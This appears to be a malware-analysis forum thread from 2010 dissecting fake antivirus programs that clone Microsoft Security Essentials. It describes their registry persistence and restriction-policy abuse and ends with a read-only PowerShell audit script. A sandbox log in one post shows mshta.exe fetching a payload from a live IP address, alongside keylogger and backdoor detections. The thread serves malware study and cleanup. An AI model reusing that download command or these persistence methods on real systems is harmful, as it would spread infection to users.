A forum for reverse engineering, OS internals and malware analysis 

 #1052  by EP_X0FF
 Mon May 10, 2010 4:23 am
Copy-paste GUI clone of Microsoft Security Essentials. This is not a simple look-alike clone (like Security Essentials) - this is a full UI copy of MSE.
Written in Delphi (cryptor + UPX inside).

VirusTotal
http://www.virustotal.com/analisis/1840 ... 1273465045

[Screenshots: GUI / Detections / Give me money dialog]

Dropped with legit MSE components to %Documents and Settings%\UserName\Application Data\Microsoft Security Essentials,
autorun through HKCU\Software\Microsoft\Windows\CurrentVersion\Run

That's how all this looks after unpacking :D
pass: malware
 #1059  by nullptr
 Tue May 11, 2010 4:51 am
It's just adding the paths of any software in its DB to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
 #1072  by EP_X0FF
 Thu May 13, 2010 4:17 am
egomoo's post about Security Essentials 2010 moved to a dedicated topic because it is not really the same MSE fake.
It is more likely a KAV/KIS parody fake AV.
 #2795  by EP_X0FF
 Sun Sep 19, 2010 10:43 am
Another interesting sample, written in Delphi, packed with UPX 3.05, of Russian origin (according to code analysis).

http://www.virustotal.com/file-scan/rep ... 1284892543

Fake MSE detection dialog.


Then it shows a dialog with a fake "Online" scan.


Of course everybody is blind except a few fake AVs - "solution found".
When you press the install button the dropper simulates a downloading process and an installation wizard appears next. When the "installation" is complete, the system is forced to reboot.
After the reboot, this is displayed on full screen.


Finally the real fake AV GUI is displayed.


The fake AV runs from X:\Documents and Settings\UserName\Application Data\ as hotfix.exe
Running through the registry key HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell


As a bonus, it has a specific hidden form with all the fake AV's labels stored :)
pass: malware
 #2801  by CloneRanger
 Sun Sep 19, 2010 6:10 pm
At least they look quite good these days, even if they don't do ANY good :P

It's not surprising a lot of people get fooled by them. The sad thing is, many people don't actually care too much about security etc. when it comes right down to it. Oh, they say they do, but as I keep finding out week after week, in reality it's too much trouble for them to learn; they just want to click and go ASAP :( Still, as long as they keep paying, why should I worry any more if they won't help themselves :P

I don't see any end in sight to Rogues infecting and ripping off people, for some time to come, due to the above. Apart from trying to educate people, I don't know what the 100% solution is, and neither do the AV etc. vendors!
 #3110  by Jaxryley
 Sun Oct 17, 2010 9:18 am
The Microsoft Security Essentials fake alert has changed tack in that it asks for a reboot to finish the install, then reboots into a blank desktop with no taskbar, with just the rogue's GUI sitting there.

Still the same in safe mode so if this gets installed on a machine then it seems that you will have to boot from a live cd and remove the hotfix.exe to get the machine back?

setup.exe - 6/42 - MD5 : fdbf10c74f93279411d7b2232d433138
http://www.virustotal.com/file-scan/rep ... 1287306939
Buster Sandbox Analyzer:
Detailed report of suspicious malware actions:

Created process: (null),C:\Users\Administrator\AppData\Roaming\1310.bat,C:\Users\Administrator\Desktop\
Created process: C:\Windows\System32\mshta.exe,"C:\Windows\System32\mshta.exe" !http://85.234.191.185/inst.php?id=02915 ... or\Desktop
Defined file type created: C:\Users\Administrator\AppData\AppData\Roaming\hotfix.exe
Defined file type created: C:\Users\Administrator\AppData\Desktop\setup.exe
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = C:\Users\Administrator\AppData\Roaming\hotfix.exe
Detected backdoor listening on port: 0
Detected keylogger functionality
Detected process privilege elevation
Internet connection: C:\Windows\System32\mshta.exe Connects to "85.234.191.185" on port 80 (TCP - HTTP).
Listed all entry names in a remote access phone book
Opened a service named: rasman
Opened a service named: Sens

Risk evaluation result: High
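An added read-only audit script (written for this thread, not code from any poster or from the samples) that checks the three persistence and tampering spots described above: the HKCU Winlogon\Shell override used by hotfix.exe, HKCU Run entries pointing into the roaming profile where the fake MSE folder is dropped, and SRP "Disallowed" path rules under Safer\CodeIdentifiers\0\Paths that nullptr noted the rogue adds. It assumes the standard SRP rule value name ItemData and only reports findings; it changes nothing, so cleanup (including the Winlogon\Shell value Jaxryley asks about) remains a manual step.

```powershell
# Added audit script, not from the thread. Read-only: reports, does not modify the registry.
$findings = @()

# 1. Winlogon\Shell: a legitimate per-user value is either absent or "explorer.exe".
#    The hotfix.exe sample replaces it so only the rogue GUI starts (also in safe mode).
$wl = 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$shell = (Get-ItemProperty -Path $wl -Name Shell -ErrorAction SilentlyContinue).Shell
if ($shell -and $shell -notmatch '^explorer\.exe$') {
    $findings += [pscustomobject]@{ Check = 'Winlogon\Shell'; Key = $wl; Value = $shell }
}

# 2. HKCU Run entries that launch something from the user's roaming profile
#    (the first sample drops into Application Data\Microsoft Security Essentials).
$run     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$appData = [Environment]::GetFolderPath('ApplicationData')
Get-ItemProperty -Path $run -ErrorAction SilentlyContinue |
    ForEach-Object { $_.PSObject.Properties } |
    Where-Object { $_.Name -notlike 'PS*' -and "$($_.Value)" -like "*$appData*" } |
    ForEach-Object {
        $findings += [pscustomobject]@{ Check = 'HKCU Run'; Key = $_.Name; Value = $_.Value }
    }

# 3. Software Restriction Policy path rules at security level 0 (= Disallowed).
#    Each rule is a GUID subkey whose ItemData value holds the blocked path (assumed
#    standard SRP layout). Per-machine rules live in HKLM; a per-user copy is also honoured.
foreach ($hive in 'HKLM', 'HKCU') {
    $paths = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"
    Get-ChildItem -Path $paths -ErrorAction SilentlyContinue | ForEach-Object {
        $blocked = (Get-ItemProperty -Path $_.PSPath -Name ItemData -ErrorAction SilentlyContinue).ItemData
        if ($blocked) {
            $findings += [pscustomobject]@{ Check = 'SRP Disallowed path'; Key = $_.PSChildName; Value = $blocked }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No suspicious entries found.' }
```

Run it from the affected user's account (or offline against a loaded hive) so HKCU resolves to the profile that was infected; any SRP rule whose path points at a real security product is the rogue's attempt to keep that product from running.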